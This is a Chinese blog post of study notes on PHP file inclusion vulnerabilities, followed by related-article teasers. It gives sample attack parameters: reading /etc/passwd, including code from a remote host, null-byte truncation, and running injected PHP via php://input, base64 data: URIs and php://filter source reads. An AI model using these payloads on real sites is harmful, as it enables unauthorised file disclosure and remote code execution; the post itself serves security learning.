文件包含漏洞知识点

最新推荐文章于 2024-08-07 10:58:17 发布
最新推荐文章于 2024-08-07 10:58:17 发布
阅读量2k 收藏
点赞数
分类专栏: Security 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45775897/article/details/122393653
版权

参考博客:https://blog.csdn.net/Monsterlz123/article/details/93964916

总结:

一、原理

include函数会把所包含文件里的代码当做php代码执行。所以我们可以在文件里写入代码目标进行操作,它不在意包含文件的类型。

二、本地文件包含漏洞

在这里插入图片描述
这边我们可以对file进行传参,这个参数是可控的我们可以输入服务器本地文件的路径,来访问。
eg:
?file=/etc/passwd
?file=C:/test/hello.txt

三、远程文件包含漏洞

代码同上,但是我们的传参要改:
eg:
?file=http://IP/test.txt
我们的代码里面可以是文本,也可以是我们的代码。
注意:%00可以用来截断后缀。截断需要php版本小于5.3.4,且关闭magic_quotes_gpc功能。也可以使用来截断。

四、PHP封装协议与文件包涵

注意参数之间可以用&来输入多个参数

1.file 协议用来访问本地文件系统

注意: file:// 这个协议后需跟文件的绝对路径。
eg:
?page=file://C:hello.txt

2.PHP伪协议–php://input和data

利用 PHP 伪协议可以使得本地文件包含执行自定义的 PHP 代码。

  • php://input (allow_url_include 为 on)
    ?file=php://input POST 提交:<?php php代码 ?>

  • data: (allow_url_include、allow_url_fopen 均为 on)
    ?page=data:text/plain,<?php php代码 ?>
    注意: data: 可以使用 base64 进行数据编码。
    eg:data:text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
    后面的是base64编码,解码内容是:<?php phpinfo();?>

这种相对适合php代码比较少的注入。

3.PHP伪协议–php://filter

  • php://filter 是一种元封装器, 用于数据流打开时的筛选过滤应用。
  • 用法:
    php://filter/[read/write=<读/写的编码>]/resource=<要读或者写的文件>
    eg:php://filter/read=convert.base64-encode/resource=show.txt
文件包含漏洞
wobushini的博客
01-21 311
php文件包含漏洞,环境为phpstudy php文件包含分为本地包含和远程包含,导致文件包含的函数有: include(); include_once(); require(); require_once(); fopen(); readfile(); 一、 php本地文件包含漏洞(LFI)(使用include函数) 1、先来看一个简单的页面 新建一个phpinfo.txt: 再新建一个she...
文件上传漏洞部分知识点
c_programj的博客
07-25 1427
文件上传漏洞知识点一、文件上传漏洞1、文件上传漏洞原理2、文件上传漏洞存在前提3、防止文件上传漏洞的方法二、解析漏洞1、IIS解析漏洞2、Apache解析漏洞3、Nginx解析漏洞三、文件上传绕过技巧1、客户端校验(js校验)2、服务端检测2.1 MIME检测绕过(Content-Type检测):2.2 服务端扩展名检测绕过:2.3 服务端文件内容检测四、 修复建议 首先,我们知道SQL注入攻击的对象是数据库,文件上传的漏洞对象是web服务;两者结合可以达到对目标的深层控制。 一、文件上传漏洞 1、文件上传
文件包含漏洞全面详解
最新发布
weixin_42340783的博客
08-07 1680
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。
网络安全——文件包含漏洞
weixin_54055099的博客
09-24 1814
文件包含漏洞的原理
文件包含知识点总结.pdf
02-10
文件包含知识点总结 一、文件包含简介 在程序开发中,为了提高代码的可维护性和重用性,开发人员往往会把具有特定功能的代码块编写到独立的文件中。当需要使用这些功能时,通过一个特殊的调用过程来引用这些代码...
文件包含漏洞所有知识
qq_43511094的博客
03-15 2629
文件包含漏洞前言一、php关于文件包含相关函数include()require()require_once()include_once()利用条件二、本地文件包含目录遍历漏洞目录遍历介绍目录遍历绕过方式防御目录遍历防御本地文件包含漏洞远程文件包含本地文件包含的利用技巧包含用户上传的文件包含data://或者php:// 等伪协议包含session文件包含日志文件,比如webserver的access log包含/proc/self/environ文件包含上传的临时文件包含其他应用创建的文件,比如数据库文件
信息安全技术:远程文件包含漏洞.pptx
11-01
总结,远程文件包含漏洞是Web应用安全的重要关注点。理解其原理、利用方式以及如何防范,对于维护网络环境的安全至关重要。在开发和运维过程中,应始终遵循最佳安全实践,定期检查并修复潜在的安全风险。
文件包含分类&&文件包含漏洞利用之读取敏感文件信息
m0_73720136的博客
05-07 670
通过本实验,掌握文件包含的分类。文件包含分为包含和远程包含。本地包含是包含目标服务器本地的文件,可以包含同目录下的文件:?也可以进行目录遍历来读取文件:?其中./是当前目录,…/是上一级目录。远程包含是包含远程服务器上的文件,?file=http://www.test.com/shell.txt(常见的有三种,http、https、ftp)。
详解文件包含漏洞
bangyan3903的博客
08-15 588
文件包含漏洞触发前提: allow_url_fopen = On && allow_url_include = Off 此时才可以触发本地文件包含漏洞 allow_url_fopen = On && allow_url_include = On 此时才可以触发远程文件包含漏洞 其中,allow_url_fopen一直都是默认开...
iwebsec靶场 文件包含漏洞通关笔记2-文件包含绕过(截断法)
mooyuan的博客
09-12 931
文件包含漏洞中,在服务器执行一个PHP文件时可以通过文件包含函数执行另一个文件,无论这个文件是不是PHP为其后缀,都可以当成PHP执行。文件上传的截断绕过通常源码包含如下字段,比如说传入的参数filename=phpinfo.txt,那么include时会为文件名加上 .html后缀,于是include的文件名就变为了phpinfo.txt.html,这样会导致文件包含漏洞利用出现失败。
DAY15:文件包含漏洞靶场手册(自用 file-include 靶场)
qq_49433473的博客
07-27 771
include自搭靶场手册,bug多 伪协议使用,后缀名绕过,路径拼接绕过。。。。
信息安全技术:文件包含漏洞截断.pptx
11-01
【信息安全技术:文件包含漏洞截断】 在信息技术领域,尤其是网络安全方面,文件包含漏洞是一种常见的安全威胁,它允许攻击者通过操纵程序中的包含语句来访问或执行未授权的文件。这种漏洞通常出现在PHP等服务器端...
文件包含漏洞03】文件包含漏洞的空字符绕过及六种利用方式
Fighting_hawk的博客
03-11 5676
1. 关于图片马的几种执行方式总结: (1)利用中间件解析漏洞,不同中间件不同版本的利用方式往往不同。 (2)利用.htaccess修改Apache局部配置。 (3) 利用文件包含执行漏洞。 2. 了解PHP魔术引号的作用。 3. 掌握文件包含漏洞空字符绕过的方法。 4. 掌握文件包含漏洞的六种利用方式。...
文件包含漏洞详解
热门推荐
把梦想放飞在蓝色的天空里...
07-14 1万+
原文作者: m4r10 http://hi.baidu.com/m4r10 转载请注明版权 &&&远程文件包含漏洞&&& 一、 什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。 涉及到的危险函数:include(),require()和incl
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值